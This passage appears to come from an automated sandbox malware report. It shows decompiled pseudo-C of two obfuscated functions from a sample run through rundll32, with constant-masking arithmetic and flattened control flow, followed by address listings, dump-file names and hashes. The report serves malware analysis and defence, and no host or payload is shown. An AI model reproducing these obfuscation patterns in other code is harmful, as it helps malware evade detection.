				signed int _v2772;
				signed int _t425;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t458;
				void* _t502;
				void* _t503;
				signed int* _t507;

				_t507 =  &_v2772;
				_v2628 = 0x98f0ce;
				_v2628 = _v2628 >> 0xb;
				_v2628 = _v2628 ^ 0x00001337;
				_v2696 = 0x96ddc1;
				_v2696 = _v2696 + 0xffff0eed;
				_v2696 = _v2696 + 0xffffc9f2;
				_v2696 = _v2696 ^ 0x009155bb;
				_v2748 = 0x5205ca;
				_v2748 = _v2748 ^ 0x19402ba5;
				_t502 = __ecx;
				_t503 = 0xea1969c;
				_t443 = 0x43;
				_v2748 = _v2748 / _t443;
				_t444 = 0xb;
				_v2748 = _v2748 / _t444;
				_v2748 = _v2748 ^ 0x000a2456;
				_v2604 = 0x2f1706;
				_t445 = 0x26;
				_v2604 = _v2604 * 6;
				_v2604 = _v2604 ^ 0x011fcdd9;
				_v2684 = 0x108800;
				_v2684 = _v2684 >> 0xc;
				_v2684 = _v2684 / _t445;
				_v2684 = _v2684 ^ 0x00056909;
				_v2764 = 0x56ac6f;
				_v2764 = _v2764 << 0xe;
				_v2764 = _v2764 | 0x24a96f4c;
				_t446 = 0x42;
				_v2764 = _v2764 / _t446;
				_v2764 = _v2764 ^ 0x02abe6d6;
				_v2680 = 0xb60c61;
				_t447 = 0x16;
				_v2680 = _v2680 / _t447;
				_v2680 = _v2680 << 7;
				_v2680 = _v2680 ^ 0x04229d93;
				_v2712 = 0x6d1dcd;
				_v2712 = _v2712 | 0x18b294c6;
				_v2712 = _v2712 ^ 0xf88c4d23;
				_v2712 = _v2712 ^ 0xe07332c4;
				_v2612 = 0x9fb2e7;
				_v2612 = _v2612 | 0xd190ff6b;
				_v2612 = _v2612 ^ 0xd1908c6f;
				_v2732 = 0x85d89e;
				_v2732 = _v2732 << 5;
				_v2732 = _v2732 >> 0xd;
				_t448 = 0x37;
				_v2732 = _v2732 / _t448;
				_v2732 = _v2732 ^ 0x0009f3db;
				_v2704 = 0x8a2dac;
				_v2704 = _v2704 << 0xd;
				_v2704 = _v2704 * 6;
				_v2704 = _v2704 ^ 0xa2425f92;
				_v2620 = 0x8530c4;
				_v2620 = _v2620 | 0x7f36b61d;
				_v2620 = _v2620 ^ 0x7fb2adaf;
				_v2756 = 0xf61f4c;
				_v2756 = _v2756 >> 0xe;
				_t449 = 0x4b;
				_v2756 = _v2756 / _t449;
				_v2756 = _v2756 + 0xffffd188;
				_v2756 = _v2756 ^ 0xfff88f11;
				_v2660 = 0x7ee31b;
				_v2660 = _v2660 | 0xd8d04f1e;
				_v2660 = _v2660 ^ 0xd8ffeb88;
				_v2672 = 0xc71ff5;
				_v2672 = _v2672 >> 0xf;
				_v2672 = _v2672 ^ 0x000b63b3;
				_v2740 = 0x49f4c1;
				_t450 = 0x76;
				_v2740 = _v2740 * 0x4b;
				_v2740 = _v2740 + 0xffff254a;
				_v2740 = _v2740 * 0x48;
				_v2740 = _v2740 ^ 0x17c5e1bd;
				_v2652 = 0x2197ca;
				_v2652 = _v2652 * 0x5a;
				_v2652 = _v2652 ^ 0x0bc440cb;
				_v2720 = 0x771a3f;
				_v2720 = _v2720 >> 0xe;
				_v2720 = _v2720 + 0x9ab6;
				_v2720 = _v2720 ^ 0x0000c33a;
				_v2688 = 0x2271c;
				_v2688 = _v2688 / _t450;
				_v2688 = _v2688 << 9;
				_v2688 = _v2688 ^ 0x0000f5c5;
				_v2608 = 0xceafd9;
				_t451 = 0x5b;
				_v2608 = _v2608 / _t451;
				_v2608 = _v2608 ^ 0x00020c5c;
				_v2644 = 0x474c12;
				_v2644 = _v2644 + 0xffff00ab;
				_v2644 = _v2644 ^ 0x00446b0a;
				_v2760 = 0xca1d14;
				_t452 = 0x36;
				_v2760 = _v2760 / _t452;
				_v2760 = _v2760 ^ 0x098f5074;
				_v2760 = _v2760 ^ 0x8a27b7fe;
				_v2760 = _v2760 ^ 0x83afe7c4;
				_v2636 = 0x5d1272;
				_v2636 = _v2636 + 0xf4cf;
				_v2636 = _v2636 ^ 0x005057cd;
				_v2768 = 0x30e751;
				_v2768 = _v2768 | 0xcda5a365;
				_t453 = 5;
				_v2768 = _v2768 * 0x7d;
				_v2768 = _v2768 + 0xffff52f5;
				_v2768 = _v2768 ^ 0x71df24ad;
				_v2772 = 0x3d9f4c;
				_v2772 = _v2772 / _t453;
				_v2772 = _v2772 | 0x64d73223;
				_v2772 = _v2772 >> 2;
				_v2772 = _v2772 ^ 0x1935e4e1;
				_v2744 = 0xaeb35;
				_v2744 = _v2744 << 0x10;
				_v2744 = _v2744 + 0xffff2953;
				_v2744 = _v2744 + 0xffff82ad;
				_v2744 = _v2744 ^ 0xeb3966f5;
				_v2752 = 0x66dc67;
				_v2752 = _v2752 + 0x90a4;
				_v2752 = _v2752 + 0x6fc1;
				_v2752 = _v2752 ^ 0x6a9d4e17;
				_v2752 = _v2752 ^ 0x6af88c69;
				_v2716 = 0xce0c89;
				_v2716 = _v2716 ^ 0x42dcf22f;
				_v2716 = _v2716 | 0xbb0a480d;
				_v2716 = _v2716 ^ 0xfb186e5d;
				_v2616 = 0x5746b3;
				_v2616 = _v2616 | 0xa6a5976e;
				_v2616 = _v2616 ^ 0xa6f469a2;
				_v2708 = 0xa6d434;
				_v2708 = _v2708 << 0xa;
				_v2708 = _v2708 | 0x1b169a68;
				_v2708 = _v2708 ^ 0x9b5e88e0;
				_v2736 = 0x9f8594;
				_v2736 = _v2736 + 0xffffc5c7;
				_t454 = 9;
				_v2736 = _v2736 / _t454;
				_v2736 = _v2736 + 0xffff650c;
				_v2736 = _v2736 ^ 0x001c27e2;
				_v2668 = 0xeff616;
				_v2668 = _v2668 << 4;
				_v2668 = _v2668 ^ 0x0efcbcf0;
				_v2640 = 0x84564;
				_v2640 = _v2640 >> 9;
				_v2640 = _v2640 ^ 0x00099447;
				_v2648 = 0xb94e9c;
				_v2648 = _v2648 >> 7;
				_v2648 = _v2648 ^ 0x000c8381;
				_v2656 = 0x4f0029;
				_v2656 = _v2656 * 0x26;
				_v2656 = _v2656 ^ 0x0bb68559;
				_v2700 = 0xc64297;
				_v2700 = _v2700 << 0x10;
				_v2700 = _v2700 ^ 0xb6f38c4d;
				_v2700 = _v2700 ^ 0xf46a369f;
				_v2664 = 0x51e71d;
				_v2664 = _v2664 * 0xf;
				_v2664 = _v2664 ^ 0x04c73adc;
				_v2728 = 0xfedaba;
				_v2728 = _v2728 + 0xfffff930;
				_v2728 = _v2728 + 0xfffff3b0;
				_v2728 = _v2728 + 0xffff7b6e;
				_v2728 = _v2728 ^ 0x00f92d7b;
				_v2632 = 0xc4e34f;
				_t425 = _v2632 * 0x17;
				_v2632 = _t425;
				_v2632 = _v2632 ^ 0x11b64b79;
				_v2676 = 0x4fbb37;
				_v2676 = _v2676 + 0x433;
				_v2676 = _v2676 >> 1;
				_v2676 = _v2676 ^ 0x002442b0;
				_v2724 = 0xe01143;
				_v2724 = _v2724 | 0x0dc37ba2;
				_v2724 = _v2724 + 0xe020;
				_v2724 = _v2724 ^ 0x0dec213c;
				_v2624 = 0xd4ff52;
				_v2624 = _v2624 << 0xe;
				_v2624 = _v2624 ^ 0x3fd02267;
				_v2692 = 0xfd19e6;
				_v2692 = _v2692 + 0x8b9c;
				_v2692 = _v2692 | 0x5cbd23eb;
				_v2692 = _v2692 ^ 0x5cf129d9;
				while(_t503 != 0x5de06da) {
					if(_t503 == 0xea1969c) {
						_t503 = 0xfa9128f;
						continue;
					} else {
						_t515 = _t503 - 0xfa9128f;
						if(_t503 != 0xfa9128f) {
							L8:
							__eflags = _t503 - 0xa8e801c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E007ADA22(_v2696, _v2748, _t515, _v2604,  &_v2600, _t454, _v2684);
							 *((short*)(E0079B6CF( &_v2600, _v2764, _v2680, _v2712))) = 0;
							E00798969(_v2612,  &_v1560, _t515, _v2732, _v2704);
							_push(_v2660);
							_push(_v2756);
							E007947CE( &_v2600, _v2672, _v2620, _v2740, _v2652, E007ADCF7(_v2620, 0x791308, _t515),  &_v1560, _v2720, _v2688);
							E0079A8B0(_v2608, _t437, _v2644);
							_t454 = _v2760;
							_t425 = E0079EA99(_v2760, _t502, _v2636, _v2768,  &_v2080, _v2772);
							_t507 =  &(_t507[0x17]);
							if(_t425 != 0) {
								_t503 = 0x5de06da;
								continue;
							}
						}
					}
					return _t425;
				}
				_push(_v2616);
				_push(_v2628);
				_push(_v2716);
				_push( &_v1040);
				E007A46BB(_v2744, _v2752);
				_push(_v2668);
				_push(_v2736);
				E007947CE( &_v1040, _v2640, _v2708, _v2648, _v2656, E007ADCF7(_v2708, 0x791348, __eflags),  &_v2080, _v2700, _v2664);
				_t458 = _v2728;
				E0079A8B0(_t458, _t428, _v2632);
				_push(_v2692);
				_push(0);
				_push(_t458);
				_push(0);
				_push(0);
				_push(_v2624);
				_t454 = _v2676;
				_push( &_v520);
				_t425 = E0079AB87(_v2676, _v2724, __eflags);
				_t507 = _t507 - 0xc + 0x64;
				_t503 = 0xa8e801c;
				goto L8;
			}



































































                                                                                                                          0x0079f09b
                                                                                                                          0x0079f0a1
                                                                                                                          0x0079f0ae
                                                                                                                          0x0079f0b6
                                                                                                                          0x0079f0c1
                                                                                                                          0x0079f0c9
                                                                                                                          0x0079f0d1
                                                                                                                          0x0079f0d9
                                                                                                                          0x0079f0e1
                                                                                                                          0x0079f0e9
                                                                                                                          0x0079f0fa
                                                                                                                          0x0079f0fc
                                                                                                                          0x0079f101
                                                                                                                          0x0079f106
                                                                                                                          0x0079f110
                                                                                                                          0x0079f115
                                                                                                                          0x0079f11b
                                                                                                                          0x0079f123
                                                                                                                          0x0079f136
                                                                                                                          0x0079f139
                                                                                                                          0x0079f140
                                                                                                                          0x0079f14b
                                                                                                                          0x0079f153
                                                                                                                          0x0079f160
                                                                                                                          0x0079f164
                                                                                                                          0x0079f16c
                                                                                                                          0x0079f174
                                                                                                                          0x0079f179
                                                                                                                          0x0079f185
                                                                                                                          0x0079f18a
                                                                                                                          0x0079f190
                                                                                                                          0x0079f198
                                                                                                                          0x0079f1a4
                                                                                                                          0x0079f1a9
                                                                                                                          0x0079f1af
                                                                                                                          0x0079f1b4
                                                                                                                          0x0079f1bc
                                                                                                                          0x0079f1c4
                                                                                                                          0x0079f1cc
                                                                                                                          0x0079f1d4
                                                                                                                          0x0079f1dc
                                                                                                                          0x0079f1e7
                                                                                                                          0x0079f1f2
                                                                                                                          0x0079f1fd
                                                                                                                          0x0079f205
                                                                                                                          0x0079f20a
                                                                                                                          0x0079f213
                                                                                                                          0x0079f216
                                                                                                                          0x0079f21a
                                                                                                                          0x0079f222
                                                                                                                          0x0079f22a
                                                                                                                          0x0079f234
                                                                                                                          0x0079f238
                                                                                                                          0x0079f240
                                                                                                                          0x0079f24d
                                                                                                                          0x0079f258
                                                                                                                          0x0079f263
                                                                                                                          0x0079f26b
                                                                                                                          0x0079f276
                                                                                                                          0x0079f27b
                                                                                                                          0x0079f281
                                                                                                                          0x0079f289
                                                                                                                          0x0079f291
                                                                                                                          0x0079f29c
                                                                                                                          0x0079f2a7
                                                                                                                          0x0079f2b2
                                                                                                                          0x0079f2ba
                                                                                                                          0x0079f2bf
                                                                                                                          0x0079f2c7
                                                                                                                          0x0079f2d4
                                                                                                                          0x0079f2d7
                                                                                                                          0x0079f2db
                                                                                                                          0x0079f2e8
                                                                                                                          0x0079f2ec
                                                                                                                          0x0079f2f4
                                                                                                                          0x0079f307
                                                                                                                          0x0079f30e
                                                                                                                          0x0079f319
                                                                                                                          0x0079f321
                                                                                                                          0x0079f326
                                                                                                                          0x0079f32e
                                                                                                                          0x0079f336
                                                                                                                          0x0079f346
                                                                                                                          0x0079f34a
                                                                                                                          0x0079f34f
                                                                                                                          0x0079f357
                                                                                                                          0x0079f369
                                                                                                                          0x0079f36e
                                                                                                                          0x0079f377
                                                                                                                          0x0079f382
                                                                                                                          0x0079f38d
                                                                                                                          0x0079f398
                                                                                                                          0x0079f3a3
                                                                                                                          0x0079f3af
                                                                                                                          0x0079f3b4
                                                                                                                          0x0079f3ba
                                                                                                                          0x0079f3c2
                                                                                                                          0x0079f3ca
                                                                                                                          0x0079f3d2
                                                                                                                          0x0079f3dd
                                                                                                                          0x0079f3e8
                                                                                                                          0x0079f3f3
                                                                                                                          0x0079f3fb
                                                                                                                          0x0079f408
                                                                                                                          0x0079f409
                                                                                                                          0x0079f40d
                                                                                                                          0x0079f415
                                                                                                                          0x0079f41d
                                                                                                                          0x0079f42b
                                                                                                                          0x0079f42f
                                                                                                                          0x0079f437
                                                                                                                          0x0079f43e
                                                                                                                          0x0079f44b
                                                                                                                          0x0079f453
                                                                                                                          0x0079f458
                                                                                                                          0x0079f460
                                                                                                                          0x0079f468
                                                                                                                          0x0079f470
                                                                                                                          0x0079f478
                                                                                                                          0x0079f480
                                                                                                                          0x0079f488
                                                                                                                          0x0079f490
                                                                                                                          0x0079f498
                                                                                                                          0x0079f4a0
                                                                                                                          0x0079f4a8
                                                                                                                          0x0079f4b0
                                                                                                                          0x0079f4b8
                                                                                                                          0x0079f4c3
                                                                                                                          0x0079f4ce
                                                                                                                          0x0079f4d9
                                                                                                                          0x0079f4e1
                                                                                                                          0x0079f4e6
                                                                                                                          0x0079f4ee
                                                                                                                          0x0079f4f6
                                                                                                                          0x0079f4fe
                                                                                                                          0x0079f50c
                                                                                                                          0x0079f50f
                                                                                                                          0x0079f513
                                                                                                                          0x0079f51b
                                                                                                                          0x0079f523
                                                                                                                          0x0079f52b
                                                                                                                          0x0079f530
                                                                                                                          0x0079f538
                                                                                                                          0x0079f543
                                                                                                                          0x0079f54b
                                                                                                                          0x0079f556
                                                                                                                          0x0079f561
                                                                                                                          0x0079f569
                                                                                                                          0x0079f574
                                                                                                                          0x0079f587
                                                                                                                          0x0079f58e
                                                                                                                          0x0079f599
                                                                                                                          0x0079f5a1
                                                                                                                          0x0079f5a6
                                                                                                                          0x0079f5ae
                                                                                                                          0x0079f5b6
                                                                                                                          0x0079f5c3
                                                                                                                          0x0079f5c7
                                                                                                                          0x0079f5cf
                                                                                                                          0x0079f5d7
                                                                                                                          0x0079f5df
                                                                                                                          0x0079f5e7
                                                                                                                          0x0079f5ef
                                                                                                                          0x0079f5f7
                                                                                                                          0x0079f602
                                                                                                                          0x0079f60a
                                                                                                                          0x0079f611
                                                                                                                          0x0079f61c
                                                                                                                          0x0079f624
                                                                                                                          0x0079f62c
                                                                                                                          0x0079f630
                                                                                                                          0x0079f638
                                                                                                                          0x0079f640
                                                                                                                          0x0079f648
                                                                                                                          0x0079f650
                                                                                                                          0x0079f658
                                                                                                                          0x0079f663
                                                                                                                          0x0079f66b
                                                                                                                          0x0079f676
                                                                                                                          0x0079f67e
                                                                                                                          0x0079f686
                                                                                                                          0x0079f68e
                                                                                                                          0x0079f696
                                                                                                                          0x0079f6a4
                                                                                                                          0x0079f7b0
                                                                                                                          0x00000000
                                                                                                                          0x0079f6aa
                                                                                                                          0x0079f6aa
                                                                                                                          0x0079f6b0
                                                                                                                          0x0079f883
                                                                                                                          0x0079f883
                                                                                                                          0x0079f889
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079f6b6
                                                                                                                          0x0079f6d2
                                                                                                                          0x0079f700
                                                                                                                          0x0079f70a
                                                                                                                          0x0079f70f
                                                                                                                          0x0079f71b
                                                                                                                          0x0079f762
                                                                                                                          0x0079f777
                                                                                                                          0x0079f795
                                                                                                                          0x0079f799
                                                                                                                          0x0079f79e
                                                                                                                          0x0079f7a3
                                                                                                                          0x0079f7a9
                                                                                                                          0x00000000
                                                                                                                          0x0079f7a9
                                                                                                                          0x0079f7a3
                                                                                                                          0x0079f6b0
                                                                                                                          0x0079f898
                                                                                                                          0x0079f898
                                                                                                                          0x0079f7ba
                                                                                                                          0x0079f7c8
                                                                                                                          0x0079f7cf
                                                                                                                          0x0079f7de
                                                                                                                          0x0079f7df
                                                                                                                          0x0079f7e4
                                                                                                                          0x0079f7f0
                                                                                                                          0x0079f837
                                                                                                                          0x0079f843
                                                                                                                          0x0079f849
                                                                                                                          0x0079f858
                                                                                                                          0x0079f85c
                                                                                                                          0x0079f85e
                                                                                                                          0x0079f85f
                                                                                                                          0x0079f861
                                                                                                                          0x0079f863
                                                                                                                          0x0079f86e
                                                                                                                          0x0079f875
                                                                                                                          0x0079f876
                                                                                                                          0x0079f87b
                                                                                                                          0x0079f87e
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: kD$)$5$<!$Q0
                                                                                                                          • API String ID: 0-101729813
                                                                                                                          • Opcode ID: 13080b3ff0323e539aced3157a95ddd05e495e4660b7de6be2b34b9f398715ad
                                                                                                                          • Instruction ID: 038b7096e91711aa412f2262fb46af0706660de605365dd7bdf9faeab2618b6c
                                                                                                                          • Opcode Fuzzy Hash: 13080b3ff0323e539aced3157a95ddd05e495e4660b7de6be2b34b9f398715ad
                                                                                                                          • Instruction Fuzzy Hash: 3812F071508380DFD3A8CF21D48AA8BBBE2FBC5758F50891DE5D986260D7B58949CF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007A66CA Relevance: 6.5, Strings: 5, Instructions: 240COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E007A66CA() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				unsigned int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				void* _t263;
				void* _t264;
				intOrPtr _t265;
				void* _t268;
				void* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				intOrPtr _t282;
				intOrPtr _t289;
				intOrPtr _t306;
				void* _t310;
				signed int* _t314;

				_t314 =  &_v1164;
				_v1044 = _v1044 & 0x00000000;
				_v1056 = 0xc409ba;
				_v1052 = 0xa85c92;
				_v1048 = 0x441ffc;
				_v1160 = 0xafc02f;
				_v1160 = _v1160 + 0xffff4fb0;
				_v1160 = _v1160 + 0x85f3;
				_t272 = 0x2a;
				_v1160 = _v1160 / _t272;
				_v1160 = _v1160 ^ 0x000b1184;
				_t310 = 0xb516bbb;
				_v1060 = 0xeb49a4;
				_v1060 = _v1060 >> 5;
				_v1060 = _v1060 ^ 0x00095d90;
				_v1136 = 0x74fb0a;
				_t273 = 0x7f;
				_v1136 = _v1136 * 0x1e;
				_v1136 = _v1136 ^ 0x978de9ec;
				_v1136 = _v1136 ^ 0xad10b4f2;
				_v1136 = _v1136 ^ 0x372b3a8e;
				_v1152 = 0xb92c6e;
				_v1152 = _v1152 ^ 0x0e0e3092;
				_v1152 = _v1152 | 0x72fa6aba;
				_v1152 = _v1152 + 0xffff103c;
				_v1152 = _v1152 ^ 0x7efa5fdf;
				_v1128 = 0x794cf8;
				_v1128 = _v1128 ^ 0x9a366bfc;
				_v1128 = _v1128 + 0xde36;
				_v1128 = _v1128 ^ 0x5c71c30d;
				_v1128 = _v1128 ^ 0xc6263e62;
				_v1156 = 0x79c02;
				_v1156 = _v1156 + 0xfffffb46;
				_v1156 = _v1156 | 0x060cf66c;
				_v1156 = _v1156 ^ 0x799dfdb7;
				_v1156 = _v1156 ^ 0x7f9bfbef;
				_v1164 = 0xbfcf15;
				_v1164 = _v1164 >> 3;
				_v1164 = _v1164 << 0xc;
				_v1164 = _v1164 << 3;
				_v1164 = _v1164 ^ 0xfcf89fe4;
				_v1112 = 0xe0c8d1;
				_v1112 = _v1112 ^ 0xbad245c5;
				_v1112 = _v1112 << 5;
				_v1112 = _v1112 ^ 0x4653cc84;
				_v1116 = 0x38a8e4;
				_v1116 = _v1116 + 0xffff2cc2;
				_v1116 = _v1116 + 0x453c;
				_v1116 = _v1116 ^ 0x0030e111;
				_v1144 = 0x8706d;
				_v1144 = _v1144 | 0x44a168a8;
				_v1144 = _v1144 * 0x4d;
				_v1144 = _v1144 >> 0x10;
				_v1144 = _v1144 ^ 0x0002b082;
				_v1068 = 0x3ad283;
				_v1068 = _v1068 + 0xc4d8;
				_v1068 = _v1068 ^ 0x003ad5e6;
				_v1148 = 0xbbdd96;
				_v1148 = _v1148 / _t273;
				_v1148 = _v1148 + 0xffff10a8;
				_v1148 = _v1148 + 0xdbb9;
				_v1148 = _v1148 ^ 0x00089235;
				_v1084 = 0xf8cace;
				_v1084 = _v1084 ^ 0x230d76f6;
				_v1084 = _v1084 ^ 0x23f29212;
				_v1140 = 0x18cea;
				_v1140 = _v1140 << 3;
				_v1140 = _v1140 << 0xa;
				_v1140 = _v1140 + 0xffff66c6;
				_v1140 = _v1140 ^ 0x3196ba0a;
				_v1104 = 0x64ea4d;
				_v1104 = _v1104 >> 0xe;
				_v1104 = _v1104 << 0x10;
				_v1104 = _v1104 ^ 0x01951052;
				_v1120 = 0x40e961;
				_v1120 = _v1120 ^ 0xb7fb83c2;
				_v1120 = _v1120 + 0xb75e;
				_v1120 = _v1120 ^ 0xb7bbc099;
				_v1096 = 0x7779e0;
				_v1096 = _v1096 | 0x86983bb4;
				_v1096 = _v1096 ^ 0x86f0c1f2;
				_v1100 = 0xda5543;
				_v1100 = _v1100 + 0xffff2368;
				_v1100 = _v1100 + 0xffff6302;
				_v1100 = _v1100 ^ 0x00d61d50;
				_v1132 = 0x843ae5;
				_v1132 = _v1132 + 0xae05;
				_v1132 = _v1132 >> 9;
				_v1132 = _v1132 | 0xb52a1de5;
				_v1132 = _v1132 ^ 0xb5269cc0;
				_v1064 = 0x4bdca1;
				_t274 = 0x36;
				_v1064 = _v1064 * 0x2d;
				_v1064 = _v1064 ^ 0x0d50802d;
				_v1076 = 0xc70263;
				_v1076 = _v1076 ^ 0xed1c16c4;
				_v1076 = _v1076 ^ 0xeddf4f32;
				_v1108 = 0x3676a5;
				_v1108 = _v1108 << 0x10;
				_v1108 = _v1108 << 8;
				_v1108 = _v1108 ^ 0xa501f64e;
				_v1088 = 0x1a5bc1;
				_v1088 = _v1088 / _t274;
				_v1088 = _v1088 ^ 0x00023ab9;
				_v1092 = 0xcce8ca;
				_v1092 = _v1092 + 0xffff41cd;
				_v1092 = _v1092 ^ 0x00c96fdb;
				_v1072 = 0x26dee9;
				_t275 = 0x31;
				_v1072 = _v1072 * 0x7c;
				_v1072 = _v1072 ^ 0x12da7d33;
				_v1124 = 0xc51f8;
				_v1124 = _v1124 * 0x7c;
				_v1124 = _v1124 | 0x22e20644;
				_v1124 = _v1124 + 0xffff053d;
				_v1124 = _v1124 ^ 0x27f3e63a;
				_v1080 = 0x33633f;
				_v1080 = _v1080 / _t275;
				_v1080 = _v1080 ^ 0x000716b7;
				E007A5C73(_t275);
				do {
					while(_t310 != 0xc63ed) {
						if(_t310 == 0x5b9c87d) {
							_push(_v1104);
							_push(_v1140);
							_t263 = E007ADCF7(_v1084, 0x791060, __eflags);
							_t264 = E007AD25E(_v1120);
							_t282 =  *0x7b3e10; // 0x0
							_t265 =  *0x7b3e10; // 0x0
							E007A453F(_v1100, __eflags, _v1132, _t263, _v1064, _t265 + 0x23c, _t282 + 0x1c, _v1076, _v1108, _t264, _t282 + 0x1c);
							_t268 = E0079A8B0(_v1088, _t263, _v1092);
							_t314 =  &(_t314[0xa]);
							_t310 = 0xc63ed;
							continue;
						} else {
							if(_t310 == 0xb516bbb) {
								_t310 = 0xc84e726;
								continue;
							} else {
								_t319 = _t310 - 0xc84e726;
								if(_t310 == 0xc84e726) {
									_push(_v1128);
									_push(_v1152);
									_t269 = E007ADCF7(_v1136, 0x791000, _t319);
									_t289 =  *0x7b3e10; // 0x0
									_t306 =  *0x7b3e10; // 0x0
									E007947CE(_t306 + 0x23c, _v1156, _t289 + 0x1c, _v1164, _v1112, _t269, _t289 + 0x1c, _v1116, _v1144);
									_t268 = E0079A8B0(_v1068, _t269, _v1148);
									_t314 =  &(_t314[9]);
									_t310 = 0x5b9c87d;
									continue;
								}
							}
						}
						goto L9;
					}
					_push(_v1080);
					_push( &_v1040);
					_push(_v1124);
					E007B13AD(_v1072,  &_v520, __eflags);
					_t314 =  &(_t314[3]);
					_t310 = 0xafb2886;
					L9:
					__eflags = _t310 - 0xafb2886;
				} while (__eflags != 0);
				return _t268;
			}


















































                                                                                                                          0x007a66ca
                                                                                                                          0x007a66d0
                                                                                                                          0x007a66d7
                                                                                                                          0x007a66df
                                                                                                                          0x007a66e7
                                                                                                                          0x007a66ef
                                                                                                                          0x007a66f7
                                                                                                                          0x007a66ff
                                                                                                                          0x007a6711
                                                                                                                          0x007a6716
                                                                                                                          0x007a671c
                                                                                                                          0x007a6724
                                                                                                                          0x007a6729
                                                                                                                          0x007a6731
                                                                                                                          0x007a6736
                                                                                                                          0x007a673e
                                                                                                                          0x007a674b
                                                                                                                          0x007a674c
                                                                                                                          0x007a6750
                                                                                                                          0x007a6758
                                                                                                                          0x007a6760
                                                                                                                          0x007a6768
                                                                                                                          0x007a6770
                                                                                                                          0x007a6778
                                                                                                                          0x007a6780
                                                                                                                          0x007a6788
                                                                                                                          0x007a6790
                                                                                                                          0x007a6798
                                                                                                                          0x007a67a0
                                                                                                                          0x007a67a8
                                                                                                                          0x007a67b0
                                                                                                                          0x007a67b8
                                                                                                                          0x007a67c0
                                                                                                                          0x007a67c8
                                                                                                                          0x007a67d0
                                                                                                                          0x007a67d8
                                                                                                                          0x007a67e0
                                                                                                                          0x007a67e8
                                                                                                                          0x007a67ed
                                                                                                                          0x007a67f2
                                                                                                                          0x007a67f7
                                                                                                                          0x007a67ff
                                                                                                                          0x007a6807
                                                                                                                          0x007a680f
                                                                                                                          0x007a6814
                                                                                                                          0x007a681c
                                                                                                                          0x007a6824
                                                                                                                          0x007a682c
                                                                                                                          0x007a6834
                                                                                                                          0x007a683c
                                                                                                                          0x007a6844
                                                                                                                          0x007a6851
                                                                                                                          0x007a6855
                                                                                                                          0x007a685a
                                                                                                                          0x007a6862
                                                                                                                          0x007a686a
                                                                                                                          0x007a6872
                                                                                                                          0x007a687a
                                                                                                                          0x007a6888
                                                                                                                          0x007a688c
                                                                                                                          0x007a6894
                                                                                                                          0x007a689c
                                                                                                                          0x007a68a4
                                                                                                                          0x007a68ac
                                                                                                                          0x007a68b4
                                                                                                                          0x007a68bc
                                                                                                                          0x007a68c4
                                                                                                                          0x007a68c9
                                                                                                                          0x007a68ce
                                                                                                                          0x007a68d8
                                                                                                                          0x007a68e0
                                                                                                                          0x007a68e8
                                                                                                                          0x007a68ed
                                                                                                                          0x007a68f2
                                                                                                                          0x007a68fa
                                                                                                                          0x007a6902
                                                                                                                          0x007a690a
                                                                                                                          0x007a6912
                                                                                                                          0x007a691a
                                                                                                                          0x007a6922
                                                                                                                          0x007a692a
                                                                                                                          0x007a6932
                                                                                                                          0x007a693a
                                                                                                                          0x007a6942
                                                                                                                          0x007a694a
                                                                                                                          0x007a6952
                                                                                                                          0x007a695a
                                                                                                                          0x007a6962
                                                                                                                          0x007a6967
                                                                                                                          0x007a696f
                                                                                                                          0x007a6977
                                                                                                                          0x007a6986
                                                                                                                          0x007a6989
                                                                                                                          0x007a698d
                                                                                                                          0x007a6995
                                                                                                                          0x007a699d
                                                                                                                          0x007a69a5
                                                                                                                          0x007a69ad
                                                                                                                          0x007a69b5
                                                                                                                          0x007a69ba
                                                                                                                          0x007a69bf
                                                                                                                          0x007a69c7
                                                                                                                          0x007a69d7
                                                                                                                          0x007a69db
                                                                                                                          0x007a69e3
                                                                                                                          0x007a69eb
                                                                                                                          0x007a69f3
                                                                                                                          0x007a69fb
                                                                                                                          0x007a6a08
                                                                                                                          0x007a6a09
                                                                                                                          0x007a6a0d
                                                                                                                          0x007a6a15
                                                                                                                          0x007a6a22
                                                                                                                          0x007a6a26
                                                                                                                          0x007a6a2e
                                                                                                                          0x007a6a36
                                                                                                                          0x007a6a3e
                                                                                                                          0x007a6a4c
                                                                                                                          0x007a6a50
                                                                                                                          0x007a6a60
                                                                                                                          0x007a6a74
                                                                                                                          0x007a6a74
                                                                                                                          0x007a6a82
                                                                                                                          0x007a6b0d
                                                                                                                          0x007a6b16
                                                                                                                          0x007a6b1e
                                                                                                                          0x007a6b2f
                                                                                                                          0x007a6b34
                                                                                                                          0x007a6b47
                                                                                                                          0x007a6b6a
                                                                                                                          0x007a6b7c
                                                                                                                          0x007a6b81
                                                                                                                          0x007a6b84
                                                                                                                          0x00000000
                                                                                                                          0x007a6a88
                                                                                                                          0x007a6a8e
